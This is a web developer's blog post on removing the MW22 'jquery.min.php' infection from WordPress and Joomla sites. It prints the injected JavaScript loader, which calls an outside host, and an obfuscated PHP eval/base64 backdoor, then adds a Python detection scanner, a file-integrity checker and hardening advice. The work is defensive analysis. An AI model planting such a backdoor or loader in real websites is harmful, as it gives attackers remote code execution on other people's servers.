
JS:MW22 jquery.min.php malware & how to remove it


So, I am a freelance web dev, malware removal guy, Python scraping guy, Joomla migration guy, WordPress guy, agency manager ….. you get the deal. Anyway, I have started noticing this “MW22” / “jquery.min.php” malware more and more recently. The footprints are mostly on WordPress and Joomla sites, and the malware targets old versions of those CMSs.
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://www.sater.com.tn/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
// only fires for visitors arriving from somewhere else (a non-empty referrer);
// the two string literals did not survive the copy on this page, and f_url is
// not used anywhere else in the snippet
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
    document.write('' + '');
}

This block of code will be present in your template's index.php file in Joomla and in your theme's header.php file in WordPress. Quite simple to remove, right? Just delete the offending block from your index.php files and everybody's happy. Sucuri and VirusTotal no longer show your site as malicious/infected. You are yet again in your final glorious form of a shining knight in white armour. You have purged the realm of the darkness and are applauded by your bosses again.

Except, you are wrong. This malware leaves a ton of backdoors and PHP shells in every conceivable corner of your site. It not only adds new backdoor files but also modifies existing ones. A typical backdoor looks like this:


<?php
// $lsie30 is an alphabet; the two names below are spelled out by picking characters from it
$lsie30 = "o46cbea_dtsp";
// characters 4,6,10,5,2,1,7,8,5,3,0,8,5 resolve to "base64_decode"
$eeb4 = strtolower($lsie30[4].$lsie30[6].$lsie30[10].$lsie30[5].$lsie30[2].$lsie30[1].$lsie30[7].$lsie30[8].$lsie30[5].$lsie30[3].$lsie30[0].$lsie30[8].$lsie30[5]);
// characters 7,11,0,10,9 resolve to "_POST"
$lbz4 = strtoupper($lsie30[7].$lsie30[11].$lsie30[0].$lsie30[10].$lsie30[9]);
// i.e. eval(base64_decode($_POST['ne9fa0d']))
if (isset(${$lbz4}['ne9fa0d'])) {
    eval($eeb4(${$lbz4}['ne9fa0d']));
}
?>

This code checks for a POST variable with a random-looking name (ne9fa0d in this sample) in the HTTP request to this file. Once it receives such a request, it decodes the contents of that variable and runs the result with eval. The function and superglobal names are assembled character by character from the $lsie30 string so that a plain search for "base64_decode" or "$_POST" never sees them.

Hundreds of files like user.php and xml.php will be added. Random files of your website will be modified. Do a grep -R "eval" of your website root, pick out the malicious files and delete them. Be aware that grepping for eval alone throws up a lot of false positives: legitimate files that happen to use eval and that you can't delete or modify.
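Because a bare grep for eval drowns you in legitimate matches, here is an added example of a small scanner that scores each file on several indicators instead of one, and that undoes the character-index trick the backdoor above uses to hide "base64_decode" and "_POST". This is my example code for this post, not part of the malware or of any CMS; the sample files are constructed in the script (the backdoor sample is the one quoted above with its quotes straightened, the template sample uses a placeholder domain instead of the real one), and the DANGEROUS_NAMES list and the 3-point threshold are my assumptions to tune per site.

```python
import re
from pathlib import Path

# Names a backdoor usually has to reach; listed only so that a name rebuilt from
# character-index concatenation can be recognised (assumed list, extend as needed).
DANGEROUS_NAMES = {"eval", "assert", "system", "passthru", "shell_exec", "base64_decode",
                   "gzinflate", "str_rot13", "create_function",
                   "_post", "_get", "_request", "_cookie"}

# Also used by legitimate plugins and template compilers, so worth one point each only.
WEAK = [r"\beval\s*\(", r"base64_decode\s*\(", r"\$_(POST|GET|REQUEST|COOKIE)\b"]

# Shapes taken from the code in the post: eval of a variable function call, a
# variable-variable superglobal ${$x}[...], and the jquery.min.php loader with its
# c_utt/c_utm query parameters. Three points each.
STRONG = [r"\beval\s*\(\s*\$\w+\s*\(", r"\$\{\s*\$\w+\s*\}\s*\[",
          r"jquery\.min\.php", r"\bc_ut[tm]="]

ASSIGN = re.compile(r"\$(\w+)\s*=\s*[\"']([^\"']*)[\"']\s*;")   # $x = "literal";
INDEX_RUN = re.compile(r"(?:\$\w+\[\d+\]\s*\.?\s*){3,}")        # $x[4].$x[6]. $x[10] ...
INDEXED = re.compile(r"\$(\w+)\[(\d+)\]")


def resolve_indexed_strings(src):
    """Rebuild names spelled as $s[4].$s[6]... from string constants assigned in the file."""
    consts = dict(ASSIGN.findall(src))
    names = []
    for run in INDEX_RUN.finditer(src):
        chars = []
        for var, idx in INDEXED.findall(run.group(0)):
            alphabet = consts.get(var)
            if alphabet is None or int(idx) >= len(alphabet):
                chars = None          # refers to something we cannot see statically
                break
            chars.append(alphabet[int(idx)])
        if chars:
            names.append("".join(chars))
    return names


def scan_source(src):
    """Score one file's contents; returns (score, list of evidence strings)."""
    score, evidence = 0, []
    for pat in STRONG:
        if re.search(pat, src, re.I):
            score += 3
            evidence.append("strong: " + pat)
    for pat in WEAK:
        if re.search(pat, src, re.I):
            score += 1
            evidence.append("weak: " + pat)
    hidden = [n for n in resolve_indexed_strings(src) if n.lower() in DANGEROUS_NAMES]
    if hidden:
        score += 3
        evidence.append("rebuilt names: " + ", ".join(hidden))
    return score, evidence


def scan_files(files):
    """files: {path: source text}. Returns {path: (score, verdict, evidence)}."""
    report = {}
    for path, src in files.items():
        score, evidence = scan_source(src)
        verdict = "likely malicious" if score >= 3 else "review" if score else "clean"
        report[path] = (score, verdict, evidence)
    return report


def scan_directory(root, suffixes=(".php", ".js", ".html", ".htm")):
    """Walk a real web root and scan every file with one of the given suffixes."""
    root = Path(root)
    files = {p.relative_to(root).as_posix(): p.read_text(errors="replace")
             for p in root.rglob("*") if p.is_file() and p.suffix.lower() in suffixes}
    return scan_files(files)


# Constructed stand-in for a web root (not real site contents).
SAMPLE_FILES = {
    # the backdoor quoted in the post, with plain quotes
    "images/user.php": """<?php $lsie30 ="o46cbea_dtsp" ;$eeb4 = strtolower($lsie30[4].$lsie30[6]. $lsie30[10].$lsie30[5].$lsie30[2]. $lsie30[1] . $lsie30[7]. $lsie30[8]. $lsie30[5]. $lsie30[3].$lsie30[0].$lsie30[8].$lsie30[5] ); $lbz4= strtoupper( $lsie30[7].$lsie30[11]. $lsie30[0]. $lsie30[10].$lsie30[9]) ;if( isset( ${ $lbz4 } ['ne9fa0d']) ){eval ( $eeb4 ( ${$lbz4}['ne9fa0d'] ) ) ;}?>""",
    # template with the injected loader; EXAMPLE-C2.invalid is a placeholder domain
    "templates/site/index.php": """<?php defined('_JEXEC') or die; ?>
<script>var base = "http://EXAMPLE-C2.invalid/js/jquery.min.php";
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);</script>""",
    # a plugin that uses eval legitimately: a bare grep would flag it too
    "plugins/tpl/compile.php": """<?php
$compiled = compile_template($tpl);
eval('?>' . $compiled);""",
    "index.php": "<?php define('_JEXEC', 1); require __DIR__ . '/includes/app.php';",
}

if __name__ == "__main__":
    for path, (score, verdict, evidence) in scan_files(SAMPLE_FILES).items():
        print(f"{score:2d} {verdict:17s} {path}  {'; '.join(evidence)}")
```

Run it on a real site with scan_directory("/var/www/html") and review everything marked "likely malicious" first, then the "review" pile by hand; rebuilt names in the evidence column tell you at a glance what an obfuscated file was hiding.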

Now, harden up your system. Change passwords, look for added users, changes in groups, unidentified logins etc. Use programs that notify you whenever the contents of your web root change. If nothing is available, use an LSM kernel module if you are allowed to. Use logs the way they were intended to be used: for analysis.
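The cheapest form of "notify me when the web root changes" is a hash manifest taken from a known-clean state and diffed against the live tree on a schedule. This is an added example of mine, not any CMS or tool's own code; the file sets are constructed inline (the "after" set has one modified template and one dropped file standing in for a backdoor), and the IGNORE_PARTS list is an assumption to adjust for your site's cache and upload directories.

```python
import hashlib
import json
from pathlib import Path

# Directories that churn legitimately and would otherwise drown the report (assumed; adjust per site).
IGNORE_PARTS = {"cache", "tmp", "logs"}


def read_webroot(root):
    """Read every regular file under root, skipping IGNORE_PARTS, as {relative path: bytes}."""
    root = Path(root)
    files = {}
    for p in root.rglob("*"):
        rel = p.relative_to(root)
        if p.is_file() and not (IGNORE_PARTS & set(rel.parts)):
            files[rel.as_posix()] = p.read_bytes()
    return files


def build_manifest(files):
    """{relative path: bytes} -> {relative path: sha256 hex digest}."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def diff_manifests(baseline, current):
    """Classify paths as added, removed or modified relative to the baseline manifest."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def save_manifest(manifest, path):
    """Persist the baseline; keep this file outside the web root and not writable by the web user."""
    Path(path).write_text(json.dumps(manifest, indent=1, sort_keys=True))


def load_manifest(path):
    return json.loads(Path(path).read_text())


def check_webroot(root, manifest_path):
    """Compare a live tree against a saved baseline; returns the diff dict."""
    return diff_manifests(load_manifest(manifest_path), build_manifest(read_webroot(root)))


# Constructed sample trees (not real site contents).
BASELINE_FILES = {
    "index.php": b"<?php define('_JEXEC', 1); require 'includes/app.php';\n",
    "administrator/index.php": b"<?php define('_JEXEC', 1); require 'includes/admin.php';\n",
    "templates/site/index.php": b"<?php echo 'clean template'; ?>\n",
}
AFTER_FILES = {
    "index.php": BASELINE_FILES["index.php"],
    "administrator/index.php": BASELINE_FILES["administrator/index.php"],
    # the loader appended to the template; EXAMPLE-C2.invalid is a placeholder domain
    "templates/site/index.php": b"<?php echo 'clean template'; ?>\n"
                                b'<script>var base = "http://EXAMPLE-C2.invalid/js/jquery.min.php";</script>\n',
    # stand-in for a dropped backdoor file
    "images/user.php": b"<?php /* constructed placeholder for a dropped backdoor */\n",
}

if __name__ == "__main__":
    changes = diff_manifests(build_manifest(BASELINE_FILES), build_manifest(AFTER_FILES))
    for kind, paths in changes.items():
        for path in paths:
            print(f"{kind:9s} {path}")
```

Take the baseline right after a clean install or a verified clean-up, store it where the web server user cannot write, and run check_webroot from cron; anything in "added" under an uploads or images directory that ends in .php is worth looking at before anything else.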

And for the love of everything that is holy, update your CMS. Allow automatic update if it is possible. Keep backups.

Special advice for WordPress users: use Wordfence and run regular scans.

PS: Want me to take a look at your website? Contact me using the Contact page.


3 thoughts on “JS:MW22 jquery.min.php malware & how to remove it”

  1. Pingback: Back after a Malware Hack – MarcForrest.com
